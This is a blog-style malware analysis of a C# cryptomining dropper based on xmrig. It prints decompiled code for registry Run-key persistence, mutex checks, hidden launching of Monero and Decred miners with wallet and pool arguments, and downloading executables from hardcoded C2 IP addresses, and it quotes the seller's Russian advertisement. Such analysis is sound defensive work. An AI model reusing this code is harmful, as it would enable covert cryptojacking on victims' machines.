Invaders must die!

Although this happened a while ago, I believe that you will still find the story below quite interesting. It was a Saturday evening when I was about to start playing Space Invaders, I had everything that I needed ready: beer, cheetos, and my speedy internet connection…

Malware Invaders!

Suddenly I realised that my GPU was not working as intended. I had spent a bunch of money on my brand new GTX1180 and it was glitching like none of my previous cards had. I know space invaders is a resource intensive game, but …

Anyhow, at this stage, quite disappointed with the sales representative, and being it late in the evening, I had no option to exchange it so my best bet was to attempt troubleshooting what was going on.

It is then, when I started digging through the processes that were using the video card, when I found something quite particular.

Maybe it was not the GPU, maybe it was not the game either, and maybe that 16 year old kid that had sold me the video card was legit…

Analysis

The analysis below covers at a high level the different modules that are associated with this piece of cryptocurrency mining malware which mostly focuses on monero. However, in specific cases, it also seems to be able to mine bitcoin .

 .--.     .----------------------.
 | _|     |                      |
 | O O   <  do you want to mine? |
 |  |  |  |                      |
 || | /   `----------------------'
 |`-'|
 `---'

The malware client is a modified copy of https://github.com/xmrig/xmrig version 2.0.1 which is known for silently mining cryptocurrencies.

Like many other malicious binaries, one of the first actions that it partakes is to obtain system information such as system architecture details (processor type) and/or type of GPU. This is with the sole purpose of being able to mine cryptocurrencies more efficiently.

Dropper

The dropper is not only responsible of the C&C communication, but it is also taking care (as its name indicates) of dropping the miner/client to the host OS.

This binary attempts to establish persistence through a registry key within Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ under the name of Windows Security Server.

Start

This function is called through the usage of the method ‘from.onload()’ when the binary is loaded.

internal class Main
{
	// Token: 0x0600000A RID: 10 RVA: 0x00002092 File Offset: 0x00000292
	public static void smethod_0()
	{
		Class8.installWinRun(Class1.string_ExecutablePath;);
		Class6.createMutex();
		Class5.startMining_minexmr();
		Class5.startMining_poolmn();
		new ProtectProcess();
		Class10.SendReportC2C();
	}
}

Malware installation:

As stated above this sample persists and ensures execution after power ups or reboots by modifying the operating system registry.

internal class Class8
{
	// Token: 0x06000024 RID: 36 RVA: 0x0000280C File Offset: 0x00000A0C
	public static void installWinRun(string string_0)
	{
		Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
		try
		{
			string[] expr_25 = Class1.string_ExecutablePath;.Split(new char[]
			{
				'\\'
			});
			string arg_2B_0 = expr_25[expr_25.Length - 1];
			RegistryKey expr_3C = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", true);
			expr_3C.SetValue("Windows Security Server", Class1.string_ExecutablePath;);
			expr_3C.Close();
		}
		catch
		{
			Console.WriteLine("Startup add error!");
		}
	}
}

It also ensures by leveraging mutexes, that one, and only instance of the miner runs on the infected host.

internal class Class6
{
	// Token: 0x0600001C RID: 28
	[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success), SuppressUnmanagedCodeSecurity]
	[DllImport("kernel32.dll", SetLastError = true)]
	[return: MarshalAs(UnmanagedType.Bool)]
	private static extern bool CloseHandle(int int_0);

	// Token: 0x0600001E RID: 30 RVA: 0x000026A8 File Offset: 0x000008A8
	public static bool createMutex()
	{
		int int_ = Class6.CreateMutex(0, true, "1");
		if (Class6.GetLastError() == 183)
		{
			Class6.CloseHandle(int_);
			return false;
		}
		return true;
	}

	// Token: 0x0600001B RID: 27
	[DllImport("kernel32.dll")]
	private static extern int CreateMutex(int int_0, bool bool_0, string string_0);

	// Token: 0x0600001D RID: 29
	[DllImport("kernel32.dll")]
	private static extern int GetLastError();
}

Prepare environment and download .exe

At this stage the malware will download from the command and control server the corresponding monero miner. This .exe will be ran with the predefined flags.

public static void startMining_minexmr()
{
	Class5.prepareEnvironment();
	string str = "." + GetInfoSystem.String_0;
	if (!Class1.bool_1)
	{
		Process.Start(new ProcessStartInfo
		{
			FileName = Class5.pathDirWork + Class5.fileExe_,
			WindowStyle = ProcessWindowStyle.Hidden,
			Arguments = "-o pool.minexmr.com:4444 -u 4EYCaxkPs9Y9baUNmcNSaS5aDBeCtVZ2DhPCGfhAjNsh2MjcLZKUGmsYwn2AvE98XqHBBDCAYFMvy9eAkLadvkqHhnYcjrQRKegVAFwEyN -p x"
		});
	}
	else
	{
		Process.Start(new ProcessStartInfo
		{
			FileName = Class5.pathDirWork + Class5.fileExe_,
			WindowStyle = ProcessWindowStyle.Hidden,
			Arguments = "-o pool.minexmr.com:4444 -u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o" + str + " -p x"
		});
	}
	bool arg_92_0 = Class5.Boolean_0;
}

prepareEnvironmet takes care of downloading and creating the directory where all operations will happen.

private static void prepareEnvironment()
{
	Directory.CreateDirectory(Class5.pathDirWork);
	string[] array = Directory.GetFiles(Class5.pathDirWork);
	for (int i = 0; i < array.Length; i++)
	{
		string text = array[i];
		if (text.Contains(".exe"))
		{
			Class5.fileExe_ = Class5.esplit_(text);
			return;
		}
	}
	array = Directory.GetDirectories(Class5.pathDirWork);
	for (int i = 0; i < array.Length; i++)
	{
		string[] files = Directory.GetFiles(array[i]);
		for (int j = 0; j < files.Length; j++)
		{
			string text2 = files[j];
			if (text2.Contains(".exe"))
			{
				Class5.fileExe_ = Class5.esplit_(text2);
				return;
			}
		}
	}
	Class5.downloadFile(GetInfoSystem.Boolean_0 ? "http://159.224.138.20/panel/mr/audiodg.exe" : "http://159.224.138.20/panel/mr/curl.exe", Class5.pathDirWork + "curl.exe");
	if (Class1.bool_2)
	{
		Class5.downloadFile(GetInfoSystem.Boolean_0 ? "http://285.58.206.45/panel/mr/audiodg.exe" : "http://285.58.206.45/panel/mr/curl.exe", Class5.pathDirWork + "curl.exe");
	}
	Class5.prepareEnvironment();
}

Should there be enough available resources on the OS, another bitcoin miner will be launched.

public static void startMining_poolmn()
{
	if (Class1.bool_0)
	{
		Class5.getExeFromDirWork();
		Process.Start(new ProcessStartInfo
		{
			FileName = Class5.pathDirWork_1 + Class5.file_,
			WindowStyle = ProcessWindowStyle.Hidden,
			Arguments = "--blake256 -o dcr.pool.mn:4722 -u vlad12345123.user -p password"
		});
		bool arg_43_0 = Class5.Boolean_1;
		return;
	}
}

Detection evasion

This method seeks for “blacklisted” processes that the malware is not interested in. If there is a match, the miner will be temporarily stopped to avoid detection.

Blacklisted processes:

PE header

Details of the binary:

x 
File Namef557bf6540e854807ef514b86d22641adfdd464a56ca21148e909429631a7509 
File Size59904 bytes 
File TypePE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows 
File Mimeapplication/x-dosexec 
MD59cd1659175e18ddcad45bf9172d30781 
SHA1d958824854532c86da47a5ad55da329ac42b9b34 
SHA256f557bf6540e854807ef514b86d22641adfdd464a56ca21148e909429631a7509 
SHA512d42be4eef0adf781427ffbdc742c5ca52ef074542cd1ecd10d38cde3600262a5f82e94a009a6c111d5bddd20ef0460c6aac4261ccfef18dabd4564b389afc8d5
CRC320E949B34 
Ssdeep768:i6L0+10EMwHPg8G03kGu32AVE03HPAtb5SeuBM+LDLz0o8LJBOo5UbNfI6stW6Or:ZV0Exs42Etb5BuBHPLzZ8XOo5uNfpv 
NameRVAVirtualSizePointerToRawDataRawDataSizeEntropy
.text0x20000xdf84512573446.66862694311
.rsrc0x100000x6005785615364.04933489262
.reloc0x120000xc593925120.0815394123432

C&C report

Ultimately the the malware will send the bot information to the command and control server(s) which are managed with the panel below.

Control Panel

It is on the code of the miner that I identified the command and control server from where the malware was downloading the different binaries:

Class5.downloadFile(GetInfoSystem.Boolean_0 ? "hxxp://159[dot]224[dot]138[dot]20/panel/mr/audiodg.exe" : "hxxp://159[dot]224[dot]138[dot]20/panel/mr/curl.exe", we need to do some black magic!

From there it was just about finding the right place to poke. This was the main dashboard: c2

A list of the infected machines and what system specifications these had: c2

An input form that allows the actors to change the parameters for the cryptocurrency miners: c2


Adversary

While I was performing the above investigation I also decided to capture some extra information with regards to the malware and its potential authors/sellers.

This is how the advertisement looked like:

Бот:
- Поддержка CPU (определение: x32/x64)
- Поддержка GPU (определение: Radeon/Nvidia).
- Скрытие майнера от большинства таскеров.
- Возможность обновления бота.
- Авторан (не реестр).
- Доступна торифицированная версия бота (выдаю только в очень крайних случаях).
- Контроль майнеров (в любом случае майнер будет восстановлен, пока жив бот).
- Запасной адрес отстука. (Опционально)
- Рандомная генерация воркеров на основе ид машины. (Опционально)
- Бесплатные ребилды.
- Вес: 60 КБ.
- NET 2.0.
- Все обновления и любая поддержка по боту бесплатны.
- Можно менять конфигурацию майнера прямо из панели (пул, кошелек, нагрузка и тд.).

Стандартная сборка майнеров:
  Monero (CPU) + Опционально: Decred (GPU)

ЯП: C#

Функционал Панели:
- Dashboard:
[*] Онлайн, Живые, За все время, За сутки.
[*] Последние машины.

- Machines:
[*] Статистика по всем ботам.
[*] Уникальный ID машины, Битность, Версия бота, Видеокарта, ЦПУ, Первый онлайн, Последний онлайн.

- Update:
[*] Возможность обновить бота.

- Arguments:
[*] Возможность сменить конфигурацию майнера.

Цена Комплекта: 125$.

Контакты:
PM Jabber: [email protected]##REDACTED##.im

Which roughly translates into:

Bot:
- CPU support (definition: x32 / x64)
- GPU support (definition: Radeon / Nvidia).
- Miner is not visible if detected (taskmanager, process explorer and etc.)
- Ability to update the bot (for changing the miners, new functionality).
- Hide the miner from most of the taskers.
- A Tor version of the bot is available. (in rare cases).
- Autoran (not the register).
- You can change the configuration of the miner directly from the panel (pool, purse, load, etc.).
- Random generation of vorkers based on the machine's id. (Optional)
- Control of the miners (in any case, the miner will be restored while the bot is alive).
- Free rebuildings.
- Size: 50 KB.
- NET 2.0.
- All updates and any support on the bot are free.

Standard assembly of the miners:
Monero (CPU) + Optional: Decred (GPU)

Panel:
- Dashboard:
[*] Online, Alive, All Time, Day.
[*] Last Machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, x32/x64, Bot Version, VideoCard, CPU, First Online, Last Online.

- Update:
[*] Update The Bot.

- Arguments:
[*] Ability to change the configuration of the miner.

Price Set: 125$.

Contacts:
PM Jabber: [email protected]##REDACTED##.im

So digging a further about that email address this is the information I came across:

Another email: [email protected]##REDACTED##.ru (leaked) which is present in


Resources


It was early in the morning of the following day when I finished this investigation, so I didn’t get to play Space Invaders, however I still had a change to enjoy my healthy cheetos and my glass of cheap wine

Drinking a glass of wine!

See you soon on the next post!

TheMalwareHunter

Back